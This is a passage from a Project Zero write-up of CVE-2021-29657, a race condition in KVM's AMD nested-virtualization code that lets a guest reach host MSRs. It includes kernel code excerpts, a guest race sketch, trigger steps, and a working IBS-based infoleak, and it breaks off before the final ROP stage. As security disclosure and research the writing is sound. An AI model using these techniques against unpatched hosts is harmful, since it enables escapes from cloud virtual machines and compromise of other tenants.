Posted by Felix Wilhelm, Project Zero

Introduction

KVM (for Kernel-based Virtual Machine) is the de-facto standard hypervisor for Linux-based cloud environments. Outside of Azure, almost all large-scale cloud and hosting providers are running on top of KVM, turning it into one of the fundamental security boundaries in the cloud.

In this blog post I describe a vulnerability in KVM's AMD-specific code and discuss how this bug can be turned into a full virtual machine escape. To the best of my knowledge, this is the first public writeup of a KVM guest-to-host breakout that does not rely on bugs in user space components such as QEMU. The discussed bug was assigned CVE-2021-29657, affects kernel versions v5.10-rc1 to v5.12-rc6 and was patched at the end of March 2021. As the bug only became exploitable in v5.10 and was discovered roughly 5 months later, most real world deployments of KVM should not be affected. I still think the issue is an interesting case study in the work required to build a stable guest-to-host escape against KVM and hope that this writeup can strengthen the case that hypervisor compromises are not only theoretical issues.

I start with a short overview of KVM's architecture, before diving into the bug and its exploitation.

KVM

KVM is a Linux based open source hypervisor supporting hardware accelerated virtualization on x86, ARM, PowerPC and S/390. In contrast to the other big open source hypervisor Xen, KVM is deeply integrated with the Linux Kernel and builds on its scheduling, memory management and hardware integrations to provide efficient virtualization.

KVM is implemented as one or more kernel modules (kvm.ko plus kvm-intel.ko or kvm-amd.ko on x86) that expose a low-level IOCTL-based API to user space processes over the /dev/kvm device. Using this API, a user space process (often called VMM for Virtual Machine Manager) can create new VMs, assign vCPUs and memory, and intercept memory or IO accesses to provide access to emulated or virtualization-aware hardware devices. QEMU has been the standard user space choice for KVM-based virtualization for a long time, but in the last few years alternatives like LKVM, crosvm or Firecracker have started to become popular.
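For readers unfamiliar with that interface, the following heavily condensed sketch shows the basic lifecycle a VMM goes through (error handling and register setup omitted). It only illustrates the public API; real VMMs like QEMU or crosvm are of course structured very differently.

#include <fcntl.h>
#include <linux/kvm.h>
#include <sys/ioctl.h>
#include <sys/mman.h>

int main(void) {
    int kvm = open("/dev/kvm", O_RDWR);        // global KVM handle
    int vm = ioctl(kvm, KVM_CREATE_VM, 0);     // one VM per user space process
    int vcpu = ioctl(vm, KVM_CREATE_VCPU, 0);  // first vCPU of the VM

    // kvm_run is the shared structure KVM uses to report exit reasons.
    int map_size = ioctl(kvm, KVM_GET_VCPU_MMAP_SIZE, 0);
    struct kvm_run *run = mmap(NULL, map_size, PROT_READ | PROT_WRITE,
                               MAP_SHARED, vcpu, 0);

    // Guest physical memory is just host memory registered with the VM.
    void *mem = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE,
                     MAP_SHARED | MAP_ANONYMOUS, -1, 0);
    struct kvm_userspace_memory_region region = {
        .slot = 0, .guest_phys_addr = 0, .memory_size = 0x1000,
        .userspace_addr = (unsigned long)mem,
    };
    ioctl(vm, KVM_SET_USER_MEMORY_REGION, &region);

    // A real VMM would load guest code into mem and initialize registers
    // (KVM_SET_REGS/KVM_SET_SREGS) before this point.
    ioctl(vcpu, KVM_RUN, 0);      // returns on the next VM exit
    return run->exit_reason;      // e.g. KVM_EXIT_IO, KVM_EXIT_MMIO, ...
}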

While KVM's reliance on a separate user space component might seem complicated at first, it has a very nice benefit: Each VM running on a KVM host has a 1:1 mapping to a Linux process, making it manageable using standard Linux tools.

This means for example, that a guest's memory can be inspected by dumping the allocated memory of its user space process or that resource limits for CPU time and memory can be applied easily. Additionally, KVM can offload most work related to device emulation to the userspace component. Outside of a couple of performance-sensitive devices related to interrupt handling, all of the complex low-level code for providing virtual disk, network or GPU access can be implemented in userspace.

When looking at public writeups of KVM-related vulnerabilities and exploits it becomes clear that this design was a wise decision. The large majority of disclosed vulnerabilities and all publicly available exploits affect QEMU and its support for emulated/paravirtualized devices.

Even though KVM's kernel attack surface is significantly smaller than the one exposed by a default QEMU configuration or similar user space VMMs, a KVM vulnerability has advantages that make it very valuable for an attacker:

  • Whereas user space VMMs can be sandboxed to reduce the impact of a VM breakout, no such option is available for KVM itself. Once an attacker is able to achieve code execution (or similarly powerful primitives like write access to page tables) in the context of the host kernel, the system is fully compromised.
  • Due to the somewhat poor security history of QEMU, new user space VMMs like crosvm or Firecracker are written in Rust, a memory safe language. Of course, there can still be non-memory safety vulnerabilities or problems due to incorrect or buggy usage of the KVM APIs, but using Rust effectively prevents the large majority of bugs that were discovered in C-based user space VMMs in the past.
  • Finally, a pure KVM exploit can work against targets that use proprietary or heavily modified user space VMMs. While the big cloud providers do not go into much detail about their virtualization stacks publicly, it is safe to assume that they do not depend on an unmodified QEMU version for their production workloads. In contrast, KVM's smaller code base makes heavy modifications unlikely (and KVM's contributor list points at a strong tendency to upstream such modifications when they exist).

With these advantages in mind, I decided to spend some time hunting for a KVM vulnerability that could be turned into a guest-to-host escape. In the past, I had some success with finding vulnerabilities in KVM's support for nested virtualization on Intel CPUs, so reviewing the same functionality for AMD seemed like a good starting point. This is even more true because the recent increase of AMD's market share in the server segment means that KVM's AMD implementation is suddenly becoming a more interesting target than it was in the last years.

Nested virtualization, the ability for a VM (called L1) to spawn nested guests (L2), was also a niche feature for a long time. However, due to hardware improvements that reduce its overhead and increasing customer demand, it's becoming more widely available. For example, Microsoft is heavily pushing for Virtualization-based Security as part of newer Windows versions, requiring nested virtualization to support cloud-hosted Windows installations. KVM enables support for nested virtualization on both AMD and Intel by default, so if an administrator or the user space VMM does not explicitly disable it, it's part of the attack surface for a malicious or compromised VM.

AMD's virtualization extension is called SVM (for Secure Virtual Machine), and in order to support nested virtualization, the host hypervisor needs to intercept all SVM instructions that are executed by its guests, emulate their behavior and keep its state in sync with the underlying hardware. As you might imagine, implementing this correctly is quite difficult, with a large potential for complex logic flaws, making it a perfect target for manual code review.

The Bug

Before diving into the KVM codebase and the bug I discovered, I want to quickly introduce how AMD SVM works to make the rest of the post easier to understand. (For a thorough documentation see AMD64 Architecture Programmer's Manual, Volume 2: System Programming Chapter 15.) SVM adds support for 6 new instructions to x86-64 if SVM support is enabled by setting the SVME bit in the EFER MSR. The most interesting of these instructions is VMRUN, which (as its name suggests) is responsible for running a guest VM. VMRUN takes an implicit parameter via the RAX register pointing to the page-aligned physical address of a data structure called "virtual machine control block" (VMCB), which describes the state and configuration of the VM.

The VMCB is split into two parts: First, the State Save area, which stores the values of all guest registers, including segment and control registers. Second, the Control area which describes the configuration of the VM. The Control area describes the virtualization features enabled for a VM, sets which VM actions are intercepted to trigger a VM exit and stores some fundamental configuration values such as the page table address used for nested paging.
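For orientation, here is a heavily trimmed sketch of how KVM describes this layout (compare struct vmcb in arch/x86/include/asm/svm.h); field order, widths and padding are simplified and most fields are omitted, so treat it as an illustration rather than the real definition:

#include <stdint.h>

struct vmcb_seg { uint16_t selector, attrib; uint32_t limit; uint64_t base; };

struct vmcb_control_area {
    uint32_t intercepts[5];   /* bitmap: which guest actions trigger a #VMEXIT */
    uint32_t asid;            /* address space ID used for TLB tagging */
    uint64_t msrpm_base_pa;   /* HPA of the 8KB MSR permission bitmap */
    uint64_t nested_ctl;      /* e.g. SVM_NESTED_CTL_NP_ENABLE for nested paging */
    uint64_t nested_cr3;      /* nested page table root when NPT is enabled */
    uint32_t exit_code;       /* reason for the most recent #VMEXIT */
    uint64_t exit_info_1, exit_info_2;
};

struct vmcb_save_area {
    struct vmcb_seg es, cs, ss, ds;   /* guest segment state */
    uint64_t efer, cr0, cr3, cr4;
    uint64_t rflags, rip, rsp, rax;   /* the only GPRs stored in the VMCB */
};

struct vmcb {
    struct vmcb_control_area control;
    struct vmcb_save_area save;
};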

If the VMCB is correctly prepared (and we are not already running in a VM), VMRUN will first save the host state in a memory region called the host save area, whose address is configured by writing a physical address to the VM_HSAVE_PA MSR. Once the host state is saved, the CPU switches to the VM context and VMRUN only returns once a VM exit is triggered for one reason or another.

An interesting aspect of SVM is that a lot of the state recovery after a VM exit has to be done by the hypervisor. Once a VM exit occurs, only RIP, RSP and RAX are restored to the previous host values and all other general purpose registers still contain the guest values. In addition, a full context switch requires manual execution of the VMSAVE/VMLOAD instructions which save/load additional system registers (FS, SS, LDTR, STAR, LSTAR …) from memory.

For nested virtualization to work, KVM intercepts execution of the VMRUN instruction and creates its own VMCB based on the VMCB the L1 guest prepared (called vmcb12 in KVM terminology). Of course, KVM can't trust the guest-provided vmcb12 and needs to carefully validate all fields that end up in the real VMCB that gets passed to the hardware (known as vmcb02).

Most of KVM's code for nested virtualization on AMD is implemented in arch/x86/kvm/svm/nested.c and the code that intercepts VMRUN instructions of nested guests is implemented in nested_svm_vmrun:

int nested_svm_vmrun(struct vcpu_svm *svm)
{
        int ret;
        struct vmcb *vmcb12;
        struct vmcb *hsave = svm->nested.hsave;
        struct vmcb *vmcb = svm->vmcb;
        struct kvm_host_map map;
        u64 vmcb12_gpa;

        vmcb12_gpa = svm->vmcb->save.rax;                             /* 1 */
        ret = kvm_vcpu_map(&svm->vcpu, gpa_to_gfn(vmcb12_gpa), &map); /* 2 */
        ...
        ret = kvm_skip_emulated_instruction(&svm->vcpu);

        vmcb12 = map.hva;

        if (!nested_vmcb_checks(svm, vmcb12)) {                       /* 3 */
                vmcb12->control.exit_code    = SVM_EXIT_ERR;
                vmcb12->control.exit_code_hi = 0;
                vmcb12->control.exit_info_1  = 0;
                vmcb12->control.exit_info_2  = 0;
                goto out;
        }
        ...
        /*
         * Save the old vmcb, so we don't need to pick what we save, but can
         * restore everything when a VMEXIT occurs
         */
        hsave->save.es     = vmcb->save.es;
        hsave->save.cs     = vmcb->save.cs;
        hsave->save.ss     = vmcb->save.ss;
        hsave->save.ds     = vmcb->save.ds;
        hsave->save.gdtr   = vmcb->save.gdtr;
        hsave->save.idtr   = vmcb->save.idtr;
        hsave->save.efer   = svm->vcpu.arch.efer;
        hsave->save.cr0    = kvm_read_cr0(&svm->vcpu);
        hsave->save.cr4    = svm->vcpu.arch.cr4;
        hsave->save.rflags = kvm_get_rflags(&svm->vcpu);
        hsave->save.rip    = kvm_rip_read(&svm->vcpu);
        hsave->save.rsp    = vmcb->save.rsp;
        hsave->save.rax    = vmcb->save.rax;
        if (npt_enabled)
                hsave->save.cr3 = vmcb->save.cr3;
        else
                hsave->save.cr3 = kvm_read_cr3(&svm->vcpu);

        copy_vmcb_control_area(&hsave->control, &vmcb->control);

        svm->nested.nested_run_pending = 1;

        if (enter_svm_guest_mode(svm, vmcb12_gpa, vmcb12))            /* 4 */
                goto out_exit_err;

        if (nested_svm_vmrun_msrpm(svm))
                goto out;

out_exit_err:
        svm->nested.nested_run_pending = 0;

        svm->vmcb->control.exit_code    = SVM_EXIT_ERR;
        svm->vmcb->control.exit_code_hi = 0;
        svm->vmcb->control.exit_info_1  = 0;
        svm->vmcb->control.exit_info_2  = 0;

        nested_svm_vmexit(svm);

out:
        kvm_vcpu_unmap(&svm->vcpu, &map, true);

        return ret;
}

The function first fetches the value of RAX out of the currently active vmcb (svm->vmcb) in 1 (numbers are marked in the code samples). For guests using nested paging (which is the only relevant configuration nowadays) RAX contains a guest physical address (GPA), which needs to be translated into a host physical address (HPA) first. kvm_vcpu_map (2) takes care of this translation and maps the underlying page to a host virtual address (HVA) that can be directly accessed by KVM.

Once the VMCB is mapped, nested_vmcb_checks is called for some basic validation in 3. Afterwards, the L1 guest context, which is stored in svm->vmcb, is copied into the host save area svm->nested.hsave before KVM enters the nested guest context by calling enter_svm_guest_mode (4).

int enter_svm_guest_mode(struct vcpu_svm *svm, u64 vmcb12_gpa,
                         struct vmcb *vmcb12)
{
        int ret;

        svm->nested.vmcb12_gpa = vmcb12_gpa;
        load_nested_vmcb_control(svm, &vmcb12->control);
        nested_prepare_vmcb_save(svm, vmcb12);
        nested_prepare_vmcb_control(svm);

        ret = nested_svm_load_cr3(&svm->vcpu, vmcb12->save.cr3,
                                  nested_npt_enabled(svm));
        if (ret)
                return ret;

        svm_set_gif(svm, true);

        return 0;
}

static void load_nested_vmcb_control(struct vcpu_svm *svm,
                                     struct vmcb_control_area *control)
{
        copy_vmcb_control_area(&svm->nested.ctl, control);
        ...
}

Looking at enter_svm_guest_mode we can see that KVM copies the vmcb12 control area directly into svm->nested.ctl and does not perform any further checks on the copied value.

Readers familiar with double fetch or Time-of-Check-to-Time-of-Use vulnerabilities might already see a potential issue here: The call to nested_vmcb_checks at the beginning of nested_svm_vmrun performs all of its checks on a copy of the VMCB that is stored in guest memory. This means that a guest with multiple CPU cores can modify fields in the VMCB after they are verified in nested_vmcb_checks, but before they are copied to svm->nested.ctl in load_nested_vmcb_control.
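Conceptually, the guest side of such a race looks like the sketch below. The bit position of INTERCEPT_VMRUN and the inline assembly are illustrative placeholders; a real guest would run this in ring 0 with a fully prepared vmcb12 page shared between two vCPUs.

#include <stdint.h>

#define INTERCEPT_VMRUN_BIT (1u << 0)   /* placeholder for the real bit position */

/* Runs on a second vCPU: constantly toggle the intercept bit inside the
 * attacker-controlled vmcb12 page, so nested_vmcb_checks sometimes sees it
 * set while the later copy into svm->nested.ctl sees it cleared. */
void flipper_thread(volatile uint32_t *vmcb12_intercepts) {
    for (;;)
        *vmcb12_intercepts ^= INTERCEPT_VMRUN_BIT;
}

/* Runs on the first vCPU: retry VMRUN until the race is won. */
void race_vmrun(uint64_t vmcb12_gpa) {
    for (;;) {
        /* VMRUN takes the guest-physical address of the VMCB in RAX. */
        asm volatile("vmrun" : : "a"(vmcb12_gpa) : "memory");
        /* After a reflected exit, a second VMRUN executed inside the L2
         * guest reveals whether the intercept bit was dropped (race won)
         * or the exit was reflected back to us as L1 (race lost). */
    }
}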

Let's look at nested_vmcb_checks to see what kind of checks we can bypass with this approach:

static bool nested_vmcb_check_controls(struct vmcb_control_area *control)
{
        if ((vmcb_is_intercept(control, INTERCEPT_VMRUN)) == 0)
                return false;

        if (control->asid == 0)
                return false;

        if ((control->nested_ctl & SVM_NESTED_CTL_NP_ENABLE) &&
            !npt_enabled)
                return false;

        return true;
}

At first glance this looks pretty harmless. control->asid isn't used anywhere, and the last check is only relevant for systems where nested paging isn't supported. However, the first check turns out to be very interesting.

For reasons unknown to me, SVM VMCBs contain a bit that enables or disables interception of the VMRUN instruction when executed inside a guest. Clearing this bit isn't actually supported by hardware and results in an immediate VMEXIT, so the check in nested_vmcb_check_controls simply replicates this behavior. When we race and bypass the check by repeatedly flipping the value of the INTERCEPT_VMRUN bit, we can end up in a situation where svm->nested.ctl contains a 0 in place of the INTERCEPT_VMRUN bit. To understand the impact we first need to see how nested vmexits are handled in KVM:

The main SVM exit handler is the function handle_exit in arch/x86/kvm/svm.c, which is called whenever a VM exit occurs. When KVM is running a nested guest, it first has to check if the exit should be handled by itself or the L1 hypervisor. To do this, it calls the function nested_svm_exit_handled (5), which will return NESTED_EXIT_DONE if the vmexit will be handled by the L1 hypervisor and no further processing by the L0 hypervisor is needed:

static int handle_exit(struct kvm_vcpu *vcpu, fastpath_t exit_fastpath)
{
        struct vcpu_svm *svm = to_svm(vcpu);
        struct kvm_run *kvm_run = vcpu->run;
        u32 exit_code = svm->vmcb->control.exit_code;
        ...
        if (is_guest_mode(vcpu)) {
                int vmexit;

                trace_kvm_nested_vmexit(exit_code, vcpu, KVM_ISA_SVM);

                vmexit = nested_svm_exit_special(svm);

                if (vmexit == NESTED_EXIT_CONTINUE)
                        vmexit = nested_svm_exit_handled(svm);  /* 5 */

                if (vmexit == NESTED_EXIT_DONE)
                        return 1;
        }
}

static int nested_svm_intercept(struct vcpu_svm *svm)
{
        // exit_code==INTERCEPT_VMRUN when the L2 guest executes vmrun
        u32 exit_code = svm->vmcb->control.exit_code;
        int vmexit = NESTED_EXIT_HOST;

        switch (exit_code) {
        case SVM_EXIT_MSR:
                vmexit = nested_svm_exit_handled_msr(svm);
                break;
        case SVM_EXIT_IOIO:
                vmexit = nested_svm_intercept_ioio(svm);
                break;
        ...
        default: {
                if (vmcb_is_intercept(&svm->nested.ctl, exit_code))  /* 7 */
                        vmexit = NESTED_EXIT_DONE;
        }
        }

        return vmexit;
}

int nested_svm_exit_handled(struct vcpu_svm *svm)
{
        int vmexit;

        vmexit = nested_svm_intercept(svm);  /* 6 */

        if (vmexit == NESTED_EXIT_DONE)
                nested_svm_vmexit(svm);      /* 8 */

        return vmexit;
}

nested_svm_exit_handled first calls nested_svm_intercept (6) to see if the exit should be handled. When we trigger an exit by executing VMRUN in an L2 guest, the default case is executed (7) to see if the INTERCEPT_VMRUN bit in svm->nested.ctl is set. Normally, this should always be the case and the function returns NESTED_EXIT_DONE to trigger a nested VM exit from L2 to L1 and to let the L1 hypervisor handle the exit (8). (This way KVM supports infinite nesting of hypervisors.)

However, if the L1 guest exploited the race condition described above, svm->nested.ctl won't have the INTERCEPT_VMRUN bit set and the VM exit will be handled by KVM itself. This results in a second call to nested_svm_vmrun while still running inside the L2 guest context. nested_svm_vmrun isn't written to handle this situation and will blindly overwrite the L1 context stored in svm->nested.hsave with data from the currently active svm->vmcb, which contains data for the L2 guest:

        /*
         * Save the old vmcb, so we don't need to pick what we save, but can
         * restore everything when a VMEXIT occurs
         */
        hsave->save.es     = vmcb->save.es;
        hsave->save.cs     = vmcb->save.cs;
        hsave->save.ss     = vmcb->save.ss;
        hsave->save.ds     = vmcb->save.ds;
        hsave->save.gdtr   = vmcb->save.gdtr;
        hsave->save.idtr   = vmcb->save.idtr;
        hsave->save.efer   = svm->vcpu.arch.efer;
        hsave->save.cr0    = kvm_read_cr0(&svm->vcpu);
        hsave->save.cr4    = svm->vcpu.arch.cr4;
        hsave->save.rflags = kvm_get_rflags(&svm->vcpu);
        hsave->save.rip    = kvm_rip_read(&svm->vcpu);
        hsave->save.rsp    = vmcb->save.rsp;
        hsave->save.rax    = vmcb->save.rax;
        if (npt_enabled)
                hsave->save.cr3 = vmcb->save.cr3;
        else
                hsave->save.cr3 = kvm_read_cr3(&svm->vcpu);

        copy_vmcb_control_area(&hsave->control, &vmcb->control);

This becomes a security issue due to the way Model Specific Register (MSR) intercepts are handled for nested guests:

SVM uses a permission bitmap to control which MSRs can be accessed by a VM. The bitmap is a 8KB data structure with two bits per MSR, one of which controls read access and the other write access. A 1 bit in this position means the access is intercepted and triggers a vm exit, a 0 bit means the VM has direct access to the MSR. The HPA address of the bitmap is stored in the VMCB control area and for normal L1 KVM guests, the pages are allocated and pinned into memory as soon as a vCPU is created.
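For illustration, a lookup in such a bitmap boils down to the following sketch. It is simplified to a single MSR range; the real bitmap is split into several 2KB ranges covering different MSR number blocks (compare svm_msrpm_offset in KVM).

#include <stdbool.h>
#include <stdint.h>

/* Two bits per MSR: the lower bit controls reads, the upper bit writes. */
static bool msr_read_intercepted(const uint8_t *msrpm, uint32_t msr) {
    uint32_t bit = msr * 2;
    return (msrpm[bit / 8] >> (bit % 8)) & 1;
}

static bool msr_write_intercepted(const uint8_t *msrpm, uint32_t msr) {
    uint32_t bit = msr * 2 + 1;
    return (msrpm[bit / 8] >> (bit % 8)) & 1;
}

/* A zeroed bitmap therefore means no interception at all: the guest may
 * access every MSR in the range directly, which is exactly the situation
 * after the freed msrpm pages are reused and overwritten with zeros. */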

For a nested guest, the MSR permission bitmap is stored in svm->nested.msrpm and its physical address is copied into the active VMCB (in svm->vmcb->control.msrpm_base_pa) while the nested guest is running. Using the described double invocation of nested_svm_vmrun, a malicious guest can copy this value into the svm->nested.hsave VMCB when copy_vmcb_control_area is executed. This is interesting because KVM's hsave area normally only contains data from the L1 guest context, so svm->nested.hsave.msrpm_base_pa would normally point to the pinned vCPU-specific MSR bitmap pages.

This edge case becomes exploitable thanks to a relatively recent change in KVM:

Since commit "2fcf4876: KVM: nSVM: implement on demand allocation of the nested state" from last October, svm->nested.msrpm is dynamically allocated and freed when a guest changes the SVME bit of the MSR_EFER register:

int svm_set_efer(struct kvm_vcpu *vcpu, u64 efer)
{
        struct vcpu_svm *svm = to_svm(vcpu);
        u64 old_efer = vcpu->arch.efer;
        vcpu->arch.efer = efer;

        if ((old_efer & EFER_SVME) != (efer & EFER_SVME)) {
                if (!(efer & EFER_SVME)) {
                        svm_leave_nested(svm);
                        svm_set_gif(svm, true);
                        ...
                        /*
                         * Free the nested guest state, unless we are in SMM.
                         * In this case we will return to the nested guest
                         * as soon as we leave SMM.
                         */
                        if (!is_smm(&svm->vcpu))
                                svm_free_nested(svm);
                } ...
        }
}

For the "disable SVME" case, KVM will first call svm_leave_nested to forcibly leave potential nested guests and then free the svm->nested data structures (including the backing pages for the MSR permission bitmap) in svm_free_nested. As svm_leave_nested believes that svm->nested.hsave contains the saved context of the L1 guest, it simply copies its control area to the real VMCB:

void svm_leave_nested(struct vcpu_svm *svm)
{
        if (is_guest_mode(&svm->vcpu)) {
                struct vmcb *hsave = svm->nested.hsave;
                struct vmcb *vmcb = svm->vmcb;
                ...
                copy_vmcb_control_area(&vmcb->control, &hsave->control);
                ...
        }
}

But as mentioned before, svm->nested.hsave->control.msrpm_base_pa can still point to svm->nested.msrpm. Once svm_free_nested is finished and KVM passes control back to the guest, the CPU will use the freed pages for its MSR permission checks. This gives a guest unrestricted access to host MSRs if the pages are reused and partially overwritten with zeros.

To summarize, a malicious guest can gain access to host MSRs using the following approach (a rough C sketch of the trigger loop follows the list):

  1. Enable the SVME bit in MSR_EFER to enable nested virtualization.
  2. Repeatedly try to launch an L2 guest using the VMRUN instruction while flipping the INTERCEPT_VMRUN bit on a second CPU core.
  3. If VMRUN succeeds, try to launch an "L3" guest using another invocation of VMRUN. If this fails, we have lost the race in step 2 and must try again. If VMRUN succeeds, we have successfully overwritten svm->nested.hsave with our L2 context.
  4. Clear the SVME bit in MSR_EFER while still running in the "L3" context. This frees the MSR permission bitmap backing pages used by the L2 guest, which is now executing again.
  5. Wait until the KVM host reuses the backing pages. This will potentially clear some or all of the bits, giving the guest access to host MSRs.

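As a rough sketch, the trigger loop could look like the following from the guest's kernel context. This is illustrative only and not taken from the actual proof-of-concept: vmrun(), rdmsr()/wrmsr() and the intercept bit position are assumed helpers and constants, and the flat control flow glosses over the fact that the second VMRUN really executes inside the L2 guest.

#include <stdbool.h>
#include <stdint.h>

#define MSR_EFER        0xc0000080
#define EFER_SVME       (1ULL << 12)
#define INTERCEPT_VMRUN 32 /* illustrative bit position only */

/* Assumed guest-side helpers wrapping the raw instructions. */
extern uint64_t rdmsr(uint32_t msr);
extern void wrmsr(uint32_t msr, uint64_t value);
extern bool vmrun(uint64_t vmcb_pa); /* true if the VMRUN was accepted */

/* Core 2: keep toggling the VMRUN intercept bit in the L2 VMCB so the
 * two VMCB reads in nested_svm_vmrun can observe different values. */
void flip_intercept_loop(volatile uint64_t *l2_intercepts)
{
        for (;;)
                *l2_intercepts ^= (1ULL << INTERCEPT_VMRUN);
}

/* Core 1: steps 2-4 of the summary above. */
void race_loop(uint64_t l2_vmcb_pa, uint64_t l3_vmcb_pa)
{
        for (;;) {
                if (!vmrun(l2_vmcb_pa))          /* step 2: launch L2 */
                        continue;
                if (vmrun(l3_vmcb_pa)) {         /* step 3: nested VMRUN */
                        /* step 4: clear SVME, freeing the live bitmap */
                        wrmsr(MSR_EFER, rdmsr(MSR_EFER) & ~EFER_SVME);
                        return;
                }
        }
}
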
When I initially discovered and reported this vulnerability, I was feeling pretty confident that this type of MSR access should be more or less equivalent to full code execution on the host. While my feeling turned out to be correct, getting there still took me multiple weeks of exploit development. In the next section I'll describe the steps to turn this primitive into a guest-to-host escape.

The Exploit

Assuming our guest can get full unrestricted access to any MSR (which is only a question of timing thanks to init_on_alloc=1 being the default for most modern distributions), how can we escalate this into running arbitrary code in the context of the KVM host? To answer this question we first need to look at what kind of MSRs are supported on a modern AMD system. Looking at the BIOS and Kernel Developer's Guide for recent AMD processors, we can find a wide range of MSRs, ranging from well known and widely used ones such as EFER (the Extended Feature Enable Register) or LSTAR (the syscall target address) to rarely used ones like SMI_ON_IO_TRAP (which can be used to generate a System Management Mode Interrupt when specific IO port ranges are accessed).

Looking at the list, several registers like LSTAR or KERNEL_GSBASE seem like interesting targets for redirecting the execution of the host kernel. Unrestricted access to these registers is actually enabled by default; however, they are automatically restored to a valid state by KVM after a vmexit, so modifying them does not lead to any changes in host behavior.

Still, there is one MSR that we previously mentioned which seems to give us a straightforward way to achieve code execution: VM_HSAVE_PA, which stores the physical address of the host save area used to restore the host context when a vmexit occurs. If we can point this MSR at a memory location under our control, we should be able to fake a malicious host context and execute our own code after a vmexit.

While this sounds pretty straightforward in theory, implementing it still has some challenges:

  • AMD is pretty clear about the fact that software should not touch the host save area in any way and that the data stored in this area is CPU-dependent: "Processor implementations may store only part or none of host state in the memory area pointed to by VM_HSAVE_PA MSR and may store some or all host state in hidden on-chip memory. Different implementations may choose to save the hidden parts of the host's segment registers as well as the selectors. For these reasons, software must not rely on the format or contents of the host state save area, nor attempt to change host state by modifying the contents of the host save area." (AMD64 Architecture Programmer's Manual, Volume 2: System Programming, Page 477). To strengthen the point, the format of the host save area is undocumented.
  • Debugging issues involving an invalid host state is very tedious as any issue leads to an immediate processor shutdown. Even worse, I wasn't sure if rewriting the VM_HSAVE_PA MSR while running inside a VM can even work. It's not really something that should happen during normal operation, so in the worst case scenario overwriting the MSR would just lead to an immediate crash.
  • Even if we can create a valid (but malicious) host save area in our guest, we still need some way to identify its host physical address (HPA). Because our guest runs with nested paging enabled, physical addresses that we can see in the guest (GPAs) are still one address translation away from their HPA equivalent.

After spending some time scrolling through AMD's documentation, I still felt that VM_HSAVE_PA was the best way forward and decided to tackle these problems one by one.

After dumping the host save area of a normal KVM guest running on an AMD EPYC 7351P CPU, the first problem goes away quickly: As it turns out, the host save area has the same layout as a normal VMCB with only a couple of relevant fields initialized. Even better, the initialized fields include all the saved host information documented in the AMD manual so the fear that all interesting host state is stored in on-chip memory seems to be unfounded.

Saving Host State. To ensure that the host can resume operation after #VMEXIT, VMRUN saves at least the following host state information:

  • CS.SEL, NEXT_RIP: The CS selector and rIP of the instruction following the VMRUN. On #VMEXIT the host resumes running at this address.
  • RFLAGS, RAX: Host processor mode and the register used by VMRUN to address the VMCB.
  • SS.SEL, RSP: Stack pointer for host.
  • CR0, CR3, CR4, EFER: Paging/operating mode for host.
  • IDTR, GDTR: The pseudo-descriptors. VMRUN does not save or restore the host LDTR.
  • ES.SEL and DS.SEL.

Under the mistaken assumption that I had solved the problem of creating a fake but valid host save area, I decided to look into building an infoleak that gives me the ability to translate GPAs to HPAs. A couple of hours of manual reading led me to an AMD-specific performance monitoring feature called Instruction Based Sampling (IBS). When IBS is enabled by writing the right magic invocation to a set of MSRs, it samples every Nth instruction that is executed and collects a wide range of information about the instruction. This information is logged in another set of MSRs and can be used to analyze the performance of any piece of code running on the CPU. While most of the documentation for IBS is pretty sparse or hard to follow, the very useful open source project AMD IBS Toolkit contains working code, a readable high level description of IBS and a lot of useful references.

IBS supports two different modes of operation: one that samples instruction fetches and one that samples micro-ops (which you can think of as the internal RISC representation of more complex x64 instructions). Depending on the operation mode, different data is collected. Besides a lot of caching and latency information that we don't care about, fetch sampling also returns the virtual address and physical address of the fetched instruction. Op sampling is even more useful as it returns the virtual address of the underlying instruction as well as the virtual and physical addresses accessed by any load or store micro op.

Interestingly, IBS does not seem to care about the virtualization context of its user, and every physical address returned by it is an HPA (of course this is not a problem outside of this exploit, as guest accesses to the IBS MSRs will normally be restricted). The wide range of data returned by IBS and the fact that it's completely driven by MSR reads and writes make it the perfect tool for building infoleaks for our exploit.

Building a GPA -> HPA leak boils down to enabling IBS ops sampling, executing a lot of instructions that access a specific memory page in our VM and reading the IBS_DC_PHYS_AD MSR to find out its HPA:

// This function leaks the HPA of a guest page using
// AMD's Instruction Based Sampling. We try to sample
// one of our memory loads/writes to *p, which will
// store the physical memory address in MSR_IBS_DC_PHYS_AD
static u64 leak_guest_hpa(u8 *p) {
  volatile u8 *ptr = p;
  u64 ibs = scatter_bits(0x2, IBS_OP_CUR_CNT_23) |
            scatter_bits(0x10, IBS_OP_MAX_CNT) | IBS_OP_EN;

  while (true) {
    wrmsr(MSR_IBS_OP_CTL, ibs);
    u64 x = 0;
    for (int i = 0; i < 0x1000; i++) {
      x = ptr[i];
      ptr[i] += ptr[i - 1];
      ptr[i] = x;
      if (i % 50 == 0) {
        u64 valid = rdmsr(MSR_IBS_OP_CTL) & IBS_OP_VAL;
        if (valid) {
          u64 op3 = rdmsr(MSR_IBS_OP_DATA3);
          if ((op3 & IBS_ST_OP) || (op3 & IBS_LD_OP)) {
            if (op3 & IBS_DC_PHY_ADDR_VALID) {
              printf("[x] leak_guest_hpa: %lx %lx %lx\n", rdmsr(MSR_IBS_OP_RIP),
                     rdmsr(MSR_IBS_DC_PHYS_AD), rdmsr(MSR_IBS_DC_LIN_AD));
              return rdmsr(MSR_IBS_DC_PHYS_AD) & ~(0xFFF);
            }
          }
          wrmsr(MSR_IBS_OP_CTL, ibs);
        }
      }
    }
    wrmsr(MSR_IBS_OP_CTL, ibs & ~IBS_OP_EN);
  }
}

Using this infoleak primitive, I started to create a fake host save area by preparing my own page tables (for pointing CR3 at them), interrupt descriptor tables and segment descriptors, and pointing RIP to a primitive shellcode that would write to the serial console. Of course, my first tries immediately crashed the whole system, and even after spending multiple days making sure everything was set up correctly, the system would crash immediately once I pointed the hsave MSR at my own location.

After getting frustrated with the total lack of progress, watching my server reboot for the hundredth time, trying to come up with a different exploitation strategy for two weeks and learning about the surprising regularity of physical page migrations on Linux, I realized that I had made an important mistake. Just because the CPU initializes all the expected fields in the host save area, it is not safe to assume that these fields are actually used for restoring the host context. Slow trial and error led to the discovery that my AMD EPYC CPU ignores everything in the host save area besides the values of the RIP, RSP and RAX registers.

While this register control would make a local privilege escalation straightforward, escaping the VM boundary is a bit more complicated. RIP and RSP control make launching a kernel ROP chain the next logical step, but this requires us to first break the host kernel's address randomization and to find a way to store controlled data at a known host virtual address (HVA).

Fortunately, we have IBS as a powerful infoleak building primitive and can use it to gather all required information in a single run:

